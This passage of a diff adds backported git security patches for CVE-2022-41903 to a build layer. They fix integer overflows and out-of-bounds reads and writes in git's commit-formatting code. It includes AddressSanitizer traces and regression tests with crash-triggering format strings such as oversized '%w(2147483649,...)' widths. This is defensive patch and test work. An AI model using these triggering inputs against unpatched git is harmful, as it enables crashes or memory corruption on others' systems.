+ 0x0c047fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c047fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c047fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+ ==10888==ABORTING
+
+Fix this bug by checking whether `end` points at the trailing NUL byte.
+Add a test which catches this out-of-bounds read and which demonstrates
+that we used to write out-of-bounds data into the formatted message.
+
+Reported-by: Markus Vervier <markus.vervier@x41-dsec.de>
+Original-patch-by: Markus Vervier <markus.vervier@x41-dsec.de>
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/f6e0b9f38987ad5e47bab551f8760b70689a5905]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ pretty.c | 2 +-
+ t/t4205-log-pretty-formats.sh | 6 ++++++
+ 2 files changed, 7 insertions(+), 1 deletion(-)
+
+diff --git a/pretty.c b/pretty.c
+index 4348a82..c49e818 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -1024,7 +1024,7 @@ static size_t parse_padding_placeholder(const char *placeholder,
+ const char *end = start + strcspn(start, ",)");
+ char *next;
+ int width;
+- if (!end || end == start)
++ if (!*end || end == start)
+ return 0;
+ width = strtol(start, &next, 10);
+ if (next == start || width == 0)
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index e69caba..8a349df 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -794,6 +794,12 @@ test_expect_success 'log --pretty with space stealing' '
+ test_cmp expect actual
+ '
+
++test_expect_success 'log --pretty with invalid padding format' '
++ printf "%s%%<(20" "$(git rev-parse HEAD)" >expect &&
++ git log -1 --pretty="format:%H%<(20" >actual &&
++ test_cmp expect actual
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ # We only assert that this command does not crash. This needs to be
+ # executed with the address sanitizer to demonstrate failure.
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-05.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-05.patch
new file mode 100644
index 0000000000..994f7a55b1
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-05.patch
@@ -0,0 +1,98 @@
+From 1de69c0cdd388b0a5b7bdde0bfa0bda514a354b0 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:46:39 +0100
+Subject: [PATCH 05/12] pretty: fix adding linefeed when placeholder is not expanded
+
+When a formatting directive has a `+` or ` ` after the `%`, then we add
+either a line feed or space if the placeholder expands to a non-empty
+string. In specific cases though this logic doesn't work as expected,
+and we try to add the character even in the case where the formatting
+directive is empty.
+
+One such pattern is `%w(1)%+d%+w(2)`. `%+d` expands to reference names
+pointing to a certain commit, like in `git log --decorate`. For a tagged
+commit this would for example expand to `\n (tag: v1.0.0)`, which has a
+leading newline due to the `+` modifier and a space added by `%d`. Now
+the second wrapping directive will cause us to rewrap the text to
+`\n(tag:\nv1.0.0)`, which is one byte shorter due to the missing leading
+space. The code that handles the `+` magic now notices that the length
+has changed and will thus try to insert a leading line feed at the
+original posititon. But as the string was shortened, the original
+position is past the buffer's boundary and thus we die with an error.
+
+Now there are two issues here:
+
+ 1. We check whether the buffer length has changed, not whether it
+ has been extended. This causes us to try and add the character
+ past the string boundary.
+
+ 2. The current logic does not make any sense whatsoever. When the
+ string got expanded due to the rewrap, putting the separator into
+ the original position is likely to put it somewhere into the
+ middle of the rewrapped contents.
+
+It is debatable whether `%+w()` makes any sense in the first place.
+Strictly speaking, the placeholder never expands to a non-empty string,
+and consequentially we shouldn't ever accept this combination. We thus
+fix the bug by simply refusing `%+w()`.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/1de69c0cdd388b0a5b7bdde0bfa0bda514a354b0]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ pretty.c | 14 +++++++++++++-
+ t/t4205-log-pretty-formats.sh | 8 ++++++++
+ 2 files changed, 21 insertions(+), 1 deletion(-)
+
+diff --git a/pretty.c b/pretty.c
+index c49e818..195d005 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -1551,9 +1551,21 @@ static size_t format_commit_item(struct strbuf *sb, /* in UTF-8 */
+ default:
+ break;
+ }
+- if (magic != NO_MAGIC)
++ if (magic != NO_MAGIC) {
+ placeholder++;
+
++ switch (placeholder[0]) {
++ case 'w':
++ /*
++ * `%+w()` cannot ever expand to a non-empty string,
++ * and it potentially changes the layout of preceding
++ * contents. We're thus not able to handle the magic in
++ * this combination and refuse the pattern.
++ */
++ return 0;
++ };
++ }
++
+ orig_len = sb->len;
+ if (((struct format_commit_context *)context)->flush_type != no_flush)
+ consumed = format_and_pad_commit(sb, placeholder, context);
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index 8a349df..fa1bc2b 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -800,6 +800,14 @@ test_expect_success 'log --pretty with invalid padding format' '
+ test_cmp expect actual
+ '
+
++test_expect_success 'log --pretty with magical wrapping directives' '
++ commit_id=$(git commit-tree HEAD^{tree} -m "describe me") &&
++ git tag describe-me $commit_id &&
++ printf "\n(tag:\ndescribe-me)%%+w(2)" >expect &&
++ git log -1 --pretty="format:%w(1)%+d%+w(2)" $commit_id >actual &&
++ test_cmp expect actual
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ # We only assert that this command does not crash. This needs to be
+ # executed with the address sanitizer to demonstrate failure.
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-06.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-06.patch
new file mode 100644
index 0000000000..93fbe5c7fe
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-06.patch
@@ -0,0 +1,90 @@
+From 48050c42c73c28b0c001d63d11dffac7e116847b Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:46:49 +0100
+Subject: [PATCH 06/12] pretty: fix integer overflow in wrapping format
+
+The `%w(width,indent1,indent2)` formatting directive can be used to
+rewrap text to a specific width and is designed after git-shortlog(1)'s
+`-w` parameter. While the three parameters are all stored as `size_t`
+internally, `strbuf_add_wrapped_text()` accepts integers as input. As a
+result, the casted integers may overflow. As these now-negative integers
+are later on passed to `strbuf_addchars()`, we will ultimately run into
+implementation-defined behaviour due to casting a negative number back
+to `size_t` again. On my platform, this results in trying to allocate
+9000 petabyte of memory.
+
+Fix this overflow by using `cast_size_t_to_int()` so that we reject
+inputs that cannot be represented as an integer.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/48050c42c73c28b0c001d63d11dffac7e116847b]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ git-compat-util.h | 8 ++++++++
+ pretty.c | 4 +++-
+ t/t4205-log-pretty-formats.sh | 12 ++++++++++++
+ 3 files changed, 23 insertions(+), 1 deletion(-)
+
+diff --git a/git-compat-util.h b/git-compat-util.h
+index a1ecfd3..b0f3890 100644
+--- a/git-compat-util.h
++++ b/git-compat-util.h
+@@ -854,6 +854,14 @@ static inline size_t st_sub(size_t a, size_t b)
+ return a - b;
+ }
+
++static inline int cast_size_t_to_int(size_t a)
++{
++ if (a > INT_MAX)
++ die("number too large to represent as int on this platform: %"PRIuMAX,
++ (uintmax_t)a);
++ return (int)a;
++}
++
+ #ifdef HAVE_ALLOCA_H
+ # include <alloca.h>
+ # define xalloca(size) (alloca(size))
+diff --git a/pretty.c b/pretty.c
+index 195d005..ff9fc97 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -898,7 +898,9 @@ static void strbuf_wrap(struct strbuf *sb, size_t pos,
+ if (pos)
+ strbuf_add(&tmp, sb->buf, pos);
+ strbuf_add_wrapped_text(&tmp, sb->buf + pos,
+- (int) indent1, (int) indent2, (int) width);
++ cast_size_t_to_int(indent1),
++ cast_size_t_to_int(indent2),
++ cast_size_t_to_int(width));
+ strbuf_swap(&tmp, sb);
+ strbuf_release(&tmp);
+ }
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index fa1bc2b..23ac508 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -808,6 +808,18 @@ test_expect_success 'log --pretty with magical wrapping directives' '
+ test_cmp expect actual
+ '
+
++test_expect_success SIZE_T_IS_64BIT 'log --pretty with overflowing wrapping directive' '
++ cat >expect <<-EOF &&
++ fatal: number too large to represent as int on this platform: 2147483649
++ EOF
++ test_must_fail git log -1 --pretty="format:%w(2147483649,1,1)%d" 2>error &&
++ test_cmp expect error &&
++ test_must_fail git log -1 --pretty="format:%w(1,2147483649,1)%d" 2>error &&
++ test_cmp expect error &&
++ test_must_fail git log -1 --pretty="format:%w(1,1,2147483649)%d" 2>error &&
++ test_cmp expect error
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ # We only assert that this command does not crash. This needs to be
+ # executed with the address sanitizer to demonstrate failure.
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-07.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-07.patch
new file mode 100644
index 0000000000..ec248ad6c2
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-07.patch
@@ -0,0 +1,123 @@
+From 522cc87fdc25449222a5894a428eebf4b8d5eaa9 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:46:53 +0100
+Subject: [PATCH 07/12] utf8: fix truncated string lengths in utf8_strnwidth()
+
+The `utf8_strnwidth()` function accepts an optional string length as
+input parameter. This parameter can either be set to `-1`, in which case
+we call `strlen()` on the input. Or it can be set to a positive integer
+that indicates a precomputed length, which callers typically compute by
+calling `strlen()` at some point themselves.
+
+The input parameter is an `int` though, whereas `strlen()` returns a
+`size_t`. This can lead to implementation-defined behaviour though when
+the `size_t` cannot be represented by the `int`. In the general case
+though this leads to wrap-around and thus to negative string sizes,
+which is sure enough to not lead to well-defined behaviour.
+
+Fix this by accepting a `size_t` instead of an `int` as string length.
+While this takes away the ability of callers to simply pass in `-1` as
+string length, it really is trivial enough to convert them to instead
+pass in `strlen()` instead.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/522cc87fdc25449222a5894a428eebf4b8d5eaa9]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ column.c | 2 +-
+ pretty.c | 4 ++--
+ utf8.c | 8 +++-----
+ utf8.h | 2 +-
+ 4 files changed, 7 insertions(+), 9 deletions(-)
+
+diff --git a/column.c b/column.c
+index 4a38eed..0c79850 100644
+--- a/column.c
++++ b/column.c
+@@ -23,7 +23,7 @@ struct column_data {
+ /* return length of 's' in letters, ANSI escapes stripped */
+ static int item_length(const char *s)
+ {
+- return utf8_strnwidth(s, -1, 1);
++ return utf8_strnwidth(s, strlen(s), 1);
+ }
+
+ /*
+diff --git a/pretty.c b/pretty.c
+index ff9fc97..c3c1443 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -1437,7 +1437,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
+ int occupied;
+ if (!start)
+ start = sb->buf;
+- occupied = utf8_strnwidth(start, -1, 1);
++ occupied = utf8_strnwidth(start, strlen(start), 1);
+ occupied += c->pretty_ctx->graph_width;
+ padding = (-padding) - occupied;
+ }
+@@ -1455,7 +1455,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
+ placeholder++;
+ total_consumed++;
+ }
+- len = utf8_strnwidth(local_sb.buf, -1, 1);
++ len = utf8_strnwidth(local_sb.buf, local_sb.len, 1);
+
+ if (c->flush_type == flush_left_and_steal) {
+ const char *ch = sb->buf + sb->len - 1;
+diff --git a/utf8.c b/utf8.c
+index 5c8f151..a66984b 100644
+--- a/utf8.c
++++ b/utf8.c
+@@ -206,13 +206,11 @@ int utf8_width(const char **start, size_t *remainder_p)
+ * string, assuming that the string is utf8. Returns strlen() instead
+ * if the string does not look like a valid utf8 string.
+ */
+-int utf8_strnwidth(const char *string, int len, int skip_ansi)
++int utf8_strnwidth(const char *string, size_t len, int skip_ansi)
+ {
+ int width = 0;
+ const char *orig = string;
+
+- if (len == -1)
+- len = strlen(string);
+ while (string && string < orig + len) {
+ int skip;
+ while (skip_ansi &&
+@@ -225,7 +223,7 @@ int utf8_strnwidth(const char *string, int len, int skip_ansi)
+
+ int utf8_strwidth(const char *string)
+ {
+- return utf8_strnwidth(string, -1, 0);
++ return utf8_strnwidth(string, strlen(string), 0);
+ }
+
+ int is_utf8(const char *text)
+@@ -792,7 +790,7 @@ int skip_utf8_bom(char **text, size_t len)
+ void strbuf_utf8_align(struct strbuf *buf, align_type position, unsigned int width,
+ const char *s)
+ {
+- int slen = strlen(s);
++ size_t slen = strlen(s);
+ int display_len = utf8_strnwidth(s, slen, 0);
+ int utf8_compensation = slen - display_len;
+
+diff --git a/utf8.h b/utf8.h
+index fcd5167..6da1b6d 100644
+--- a/utf8.h
++++ b/utf8.h
+@@ -7,7 +7,7 @@ typedef unsigned int ucs_char_t; /* assuming 32bit int */
+
+ size_t display_mode_esc_sequence_len(const char *s);
+ int utf8_width(const char **start, size_t *remainder_p);
+-int utf8_strnwidth(const char *string, int len, int skip_ansi);
++int utf8_strnwidth(const char *string, size_t len, int skip_ansi);
+ int utf8_strwidth(const char *string);
+ int is_utf8(const char *text);
+ int is_encoding_utf8(const char *name);
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-08.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-08.patch
new file mode 100644
index 0000000000..3de6a5ba6a
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-08.patch
@@ -0,0 +1,67 @@
+From 17d23e8a3812a5ca3dd6564e74d5250f22e5d76d Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:47:00 +0100
+Subject: [PATCH 08/12] utf8: fix returning negative string width
+
+The `utf8_strnwidth()` function calls `utf8_width()` in a loop and adds
+its returned width to the end result. `utf8_width()` can return `-1`
+though in case it reads a control character, which means that the
+computed string width is going to be wrong. In the worst case where
+there are more control characters than non-control characters, we may
+even return a negative string width.
+
+Fix this bug by treating control characters as having zero width.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/17d23e8a3812a5ca3dd6564e74d5250f22e5d76d]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ t/t4205-log-pretty-formats.sh | 6 ++++++
+ utf8.c | 8 ++++++--
+ 2 files changed, 12 insertions(+), 2 deletions(-)
+
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index 23ac508..261a6f0 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -820,6 +820,12 @@ test_expect_success SIZE_T_IS_64BIT 'log --pretty with overflowing wrapping dire
+ test_cmp expect error
+ '
+
++test_expect_success 'log --pretty with padding and preceding control chars' '
++ printf "\20\20 0" >expect &&
++ git log -1 --pretty="format:%x10%x10%>|(4)%x30" >actual &&
++ test_cmp expect actual
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ # We only assert that this command does not crash. This needs to be
+ # executed with the address sanitizer to demonstrate failure.
+diff --git a/utf8.c b/utf8.c
+index a66984b..6632bd2 100644
+--- a/utf8.c
++++ b/utf8.c
+@@ -212,11 +212,15 @@ int utf8_strnwidth(const char *string, size_t len, int skip_ansi)
+ const char *orig = string;
+
+ while (string && string < orig + len) {
+- int skip;
++ int glyph_width, skip;
++
+ while (skip_ansi &&
+ (skip = display_mode_esc_sequence_len(string)) != 0)
+ string += skip;
+- width += utf8_width(&string, NULL);
++
++ glyph_width = utf8_width(&string, NULL);
++ if (glyph_width > 0)
++ width += glyph_width;
+ }
+ return string ? width : len;
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-09.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-09.patch
new file mode 100644
index 0000000000..761d4c6a9f
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-09.patch
@@ -0,0 +1,162 @@
+From 937b71cc8b5b998963a7f9a33312ba3549d55510 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:47:04 +0100
+Subject: [PATCH 09/12] utf8: fix overflow when returning string width
+
+The return type of both `utf8_strwidth()` and `utf8_strnwidth()` is
+`int`, but we operate on string lengths which are typically of type
+`size_t`. This means that when the string is longer than `INT_MAX`, we
+will overflow and thus return a negative result.
+
+This can lead to an out-of-bounds write with `--pretty=format:%<1)%B`
+and a commit message that is 2^31+1 bytes long:
+
+ =================================================================
+ ==26009==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000001168 at pc 0x7f95c4e5f427 bp 0x7ffd8541c900 sp 0x7ffd8541c0a8
+ WRITE of size 2147483649 at 0x603000001168 thread T0
+ #0 0x7f95c4e5f426 in __interceptor_memcpy /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827
+ #1 0x5612bbb1068c in format_and_pad_commit pretty.c:1763
+ #2 0x5612bbb1087a in format_commit_item pretty.c:1801
+ #3 0x5612bbc33bab in strbuf_expand strbuf.c:429
+ #4 0x5612bbb110e7 in repo_format_commit_message pretty.c:1869
+ #5 0x5612bbb12d96 in pretty_print_commit pretty.c:2161
+ #6 0x5612bba0a4d5 in show_log log-tree.c:781
+ #7 0x5612bba0d6c7 in log_tree_commit log-tree.c:1117
+ #8 0x5612bb691ed5 in cmd_log_walk_no_free builtin/log.c:508
+ #9 0x5612bb69235b in cmd_log_walk builtin/log.c:549
+ #10 0x5612bb6951a2 in cmd_log builtin/log.c:883
+ #11 0x5612bb56c993 in run_builtin git.c:466
+ #12 0x5612bb56d397 in handle_builtin git.c:721
+ #13 0x5612bb56db07 in run_argv git.c:788
+ #14 0x5612bb56e8a7 in cmd_main git.c:923
+ #15 0x5612bb803682 in main common-main.c:57
+ #16 0x7f95c4c3c28f (/usr/lib/libc.so.6+0x2328f)
+ #17 0x7f95c4c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+ #18 0x5612bb5680e4 in _start ../sysdeps/x86_64/start.S:115
+
+ 0x603000001168 is located 0 bytes to the right of 24-byte region [0x603000001150,0x603000001168)
+ allocated by thread T0 here:
+ #0 0x7f95c4ebe7ea in __interceptor_realloc /usr/src/debug/gcc/libsanitizer/asan/asan_malloc_linux.cpp:85
+ #1 0x5612bbcdd556 in xrealloc wrapper.c:136
+ #2 0x5612bbc310a3 in strbuf_grow strbuf.c:99
+ #3 0x5612bbc32acd in strbuf_add strbuf.c:298
+ #4 0x5612bbc33aec in strbuf_expand strbuf.c:418
+ #5 0x5612bbb110e7 in repo_format_commit_message pretty.c:1869
+ #6 0x5612bbb12d96 in pretty_print_commit pretty.c:2161
+ #7 0x5612bba0a4d5 in show_log log-tree.c:781
+ #8 0x5612bba0d6c7 in log_tree_commit log-tree.c:1117
+ #9 0x5612bb691ed5 in cmd_log_walk_no_free builtin/log.c:508
+ #10 0x5612bb69235b in cmd_log_walk builtin/log.c:549
+ #11 0x5612bb6951a2 in cmd_log builtin/log.c:883
+ #12 0x5612bb56c993 in run_builtin git.c:466
+ #13 0x5612bb56d397 in handle_builtin git.c:721
+ #14 0x5612bb56db07 in run_argv git.c:788
+ #15 0x5612bb56e8a7 in cmd_main git.c:923
+ #16 0x5612bb803682 in main common-main.c:57
+ #17 0x7f95c4c3c28f (/usr/lib/libc.so.6+0x2328f)
+
+ SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827 in __interceptor_memcpy
+ Shadow bytes around the buggy address:
+ 0x0c067fff81d0: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa
+ 0x0c067fff81e0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
+ 0x0c067fff81f0: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa
+ 0x0c067fff8200: fd fd fd fa fa fa fd fd fd fd fa fa 00 00 00 fa
+ 0x0c067fff8210: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd
+ =>0x0c067fff8220: fd fa fa fa fd fd fd fa fa fa 00 00 00[fa]fa fa
+ 0x0c067fff8230: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c067fff8240: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c067fff8250: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c067fff8260: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c067fff8270: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+ ==26009==ABORTING
+
+Now the proper fix for this would be to convert both functions to return
+an `size_t` instead of an `int`. But given that this commit may be part
+of a security release, let's instead do the minimal viable fix and die
+in case we see an overflow.
+
+Add a test that would have previously caused us to crash.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/937b71cc8b5b998963a7f9a33312ba3549d55510]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ t/t4205-log-pretty-formats.sh | 8 ++++++++
+ utf8.c | 12 +++++++++---
+ 2 files changed, 17 insertions(+), 3 deletions(-)
+
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index 261a6f0..de15007 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -843,4 +843,12 @@ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit mes
+ test_cmp expect actual
+ '
+
++test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message does not cause allocation failure' '
++ test_must_fail git log -1 --format="%<(1)%B" $huge_commit 2>error &&
++ cat >expect <<-EOF &&
++ fatal: number too large to represent as int on this platform: 2147483649
++ EOF
++ test_cmp expect error
++'
++
+ test_done
+diff --git a/utf8.c b/utf8.c
+index 6632bd2..03be475 100644
+--- a/utf8.c
++++ b/utf8.c
+@@ -208,11 +208,12 @@ int utf8_width(const char **start, size_t *remainder_p)
+ */
+ int utf8_strnwidth(const char *string, size_t len, int skip_ansi)
+ {
+- int width = 0;
+ const char *orig = string;
++ size_t width = 0;
+
+ while (string && string < orig + len) {
+- int glyph_width, skip;
++ int glyph_width;
++ size_t skip;
+
+ while (skip_ansi &&
+ (skip = display_mode_esc_sequence_len(string)) != 0)
+@@ -222,7 +223,12 @@ int utf8_strnwidth(const char *string, size_t len, int skip_ansi)
+ if (glyph_width > 0)
+ width += glyph_width;
+ }
+- return string ? width : len;
++
++ /*
++ * TODO: fix the interface of this function and `utf8_strwidth()` to
++ * return `size_t` instead of `int`.
++ */
++ return cast_size_t_to_int(string ? width : len);
+ }
+
+ int utf8_strwidth(const char *string)
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-10.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-10.patch
new file mode 100644
index 0000000000..bbfc6e758f
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-10.patch
@@ -0,0 +1,99 @@
+From 81c2d4c3a5ba0e6ab8c348708441fed170e63a82 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:47:10 +0100
+Subject: [PATCH 10/12] utf8: fix checking for glyph width in strbuf_utf8_replace()
+
+In `strbuf_utf8_replace()`, we call `utf8_width()` to compute the width
+of the current glyph. If the glyph is a control character though it can
+be that `utf8_width()` returns `-1`, but because we assign this value to
+a `size_t` the conversion will cause us to underflow. This bug can
+easily be triggered with the following command:
+
+ $ git log --pretty='format:xxx%<|(1,trunc)%x10'
+
+>From all I can see though this seems to be a benign underflow that has
+no security-related consequences.
+
+Fix the bug by using an `int` instead. When we see a control character,
+we now copy it into the target buffer but don't advance the current
+width of the string.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/81c2d4c3a5ba0e6ab8c348708441fed170e63a82]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ t/t4205-log-pretty-formats.sh | 7 +++++++
+ utf8.c | 19 ++++++++++++++-----
+ 2 files changed, 21 insertions(+), 5 deletions(-)
+
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index de15007..52c8bc8 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -826,6 +826,13 @@ test_expect_success 'log --pretty with padding and preceding control chars' '
+ test_cmp expect actual
+ '
+
++test_expect_success 'log --pretty truncation with control chars' '
++ test_commit "$(printf "\20\20\20\20xxxx")" file contents commit-with-control-chars &&
++ printf "\20\20\20\20x.." >expect &&
++ git log -1 --pretty="format:%<(3,trunc)%s" commit-with-control-chars >actual &&
++ test_cmp expect actual
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ # We only assert that this command does not crash. This needs to be
+ # executed with the address sanitizer to demonstrate failure.
+diff --git a/utf8.c b/utf8.c
+index 03be475..ec03e69 100644
+--- a/utf8.c
++++ b/utf8.c
+@@ -377,6 +377,7 @@ void strbuf_utf8_replace(struct strbuf *sb_src, int pos, int width,
+ dst = sb_dst.buf;
+
+ while (src < end) {
++ int glyph_width;
+ char *old;
+ size_t n;
+
+@@ -390,21 +391,29 @@ void strbuf_utf8_replace(struct strbuf *sb_src, int pos, int width,
+ break;
+
+ old = src;
+- n = utf8_width((const char**)&src, NULL);
+- if (!src) /* broken utf-8, do nothing */
++ glyph_width = utf8_width((const char**)&src, NULL);
++ if (!src) /* broken utf-8, do nothing */
+ goto out;
+- if (n && w >= pos && w < pos + width) {
++
++ /*
++ * In case we see a control character we copy it into the
++ * buffer, but don't add it to the width.
++ */
++ if (glyph_width < 0)
++ glyph_width = 0;
++
++ if (glyph_width && w >= pos && w < pos + width) {
+ if (subst) {
+ memcpy(dst, subst, subst_len);
+ dst += subst_len;
+ subst = NULL;
+ }
+- w += n;
++ w += glyph_width;
+ continue;
+ }
+ memcpy(dst, old, src - old);
+ dst += src - old;
+- w += n;
++ w += glyph_width;
+ }
+ strbuf_setlen(&sb_dst, dst - sb_dst.buf);
+ strbuf_swap(sb_src, &sb_dst);
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-11.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-11.patch
new file mode 100644
index 0000000000..f339edfc8a
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-11.patch
@@ -0,0 +1,90 @@
+From f930a2394303b902e2973f4308f96529f736b8bc Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:47:15 +0100
+Subject: [PATCH 11/12] utf8: refactor strbuf_utf8_replace to not rely on preallocated buffer
+
+In `strbuf_utf8_replace`, we preallocate the destination buffer and then
+use `memcpy` to copy bytes into it at computed offsets. This feels
